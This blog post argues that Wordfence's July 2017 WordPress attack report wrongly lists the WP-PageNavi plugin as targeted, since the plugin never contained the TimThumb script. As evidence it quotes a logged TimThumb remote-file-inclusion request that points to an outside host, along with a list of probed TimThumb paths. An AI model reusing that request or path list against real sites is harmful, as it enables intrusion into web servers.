11 Aug

Wordfence Unnecessarily Scares Public by Including Non-Existent Threat Against Plugin in Their WordPress Attack Report

Unfortunately much of the security industry doesn’t seem to have interest in being responsible when it comes to security information they put out, instead they throw out information without regards to accuracy, often causing the public to be concerned about non-threats (while real threats go under focused).

A case in point of this is something we just looked into involving Wordfence and their The July 2017 WordPress Attack Report. The report is rather inaccurate, for example there is a whole section on brute force attacks, despite those not occurring. But what brought our attention to the report was a thread on the WordPress Support Forum that came up in our monitoring of that for mentions of vulnerabilities in plugins. The person that started the thread had deactivated the plugin WP-PageNavi due Wordfence’s claim about the plugin in the report:

We looked into the details of the biggest mover on the list, ‘wp-pagenavi’, which moved up 38 spots to number 11. The surge in attacks are attempting to exploit the TimThumb vulnerability we discussed in the theme section. We couldn’t find reference to the plugin including TimThumb, but given that the TimThumb vulnerability in question is over 5 years old now it would be difficult to say for sure.

We don’t understand why Wordfence is saying that it would be difficult to say if the plugin used TimThumb, seeing as the plugin is available in the Plugin Directory and therefore all the versions that have been available through that are still viewable through the Subversion repository that stores the plugins. This certainly wouldn’t even be the first recent instance where Wordfence didn’t appear to have done proper due diligence before making a claim.

The developer of the plugin responded in the thread this way:

It is a popular plugin and I am not surprised. The plugin has NEVER use TimThumb before and as far as I know, there is no vulnerability being reported to me.

In looking at the logs of several our website going back through the beginning of July we saw 0 requests for anything files from that plugin. If there was a large scale attempt to exploit something in that plugin there would have been, as there has been for every other large scale attempt to exploit a plugin in at least the recent past. So it looks like their list of the most exploited plugins is including many things that are not receiving significant exploitation attempts (considering that based on past experience Wordfence isn’t even aware of many plugin vulnerabilities that are being targeted they probably are missing vulnerabilities that should be listed).

Looking at one of the websites we monitor to help keep track of what plugin vulnerabilities are being targeted, abuseipdb.com, we found the start of what might explain what is going on here. One of the pages on that website showed a request to a file within the directory of WP-PageNavi that happened in May:

/wp-content/plugins/wp-pagenavi/inc/thumb.php?src=http://blogger.comxvas.ml/s.php

That file hasn’t actually existed in WP-PageNavi though. So why send a request there? One explanation could be that a hacker plants a backdoor file in that location on hacked websites and someone was sending a request hoping the file was there. In this case though that seems unlikely because it does look like an attempt to exploit the vulnerability that had existed years ago in the TimThumb script.

Doing a search for “/wp-pagenavi/inc/thumb.php” for brought us to a page that lists location where the TimThumb script was supposed to have been in various software. It lists multiple locations in this plugin:

wp-plugins/wp-pagenavi/functions/thumb.php
wp-plugins/wp-pagenavi/functions/timthumb.php
wp-plugins/wp-pagenavi/inc/thumb.php
wp-plugins/wp-pagenavi/inc/timthumb.php
wp-plugins/wp-pagenavi/scripts/thumb.php
wp-plugins/wp-pagenavi/scripts/timthumb.php
wp-plugins/wp-pagenavi/thumb.php
wp-plugins/wp-pagenavi/timthumb.php
wp-plugins/wp-pagenavi/timthumb.phptimthumb.php

The directory structure there isn’t even right in that (it should start “wp-content/plugins”) and the TimThumb file wouldn’t be in all those locations in a plugin, but it does point to there having been a belief that the TimThumb script had been in this plugin.

So what looks to be going on here is that Wordfence is seeing attempts to exploit a vulnerability that hasn’t really existed (those are not all that uncommon) and they either don’t understand that or don’t care and included it in their data. That leads to people reading their report to falsely think that there has been a vulnerability that is being targeted by hackers in the plugin WP-PageNavi, when there hasn’t. Assuming that is true, Wordfence is being highly irresponsible here and they should stop putting out those reports until they can take the time to put out accurate information because as thread on WordPress Support Forum show this misleading data is causing the public to take unneeded action.

2 thoughts on “Wordfence Unnecessarily Scares Public by Including Non-Existent Threat Against Plugin in Their WordPress Attack Report

    • You would need to ask them what their response to this was, but they were contacted by the developer of the plugin before we even came across the thread discussing the issue or wrote this post.

Leave a Reply

Your email address will not be published. Required fields are marked *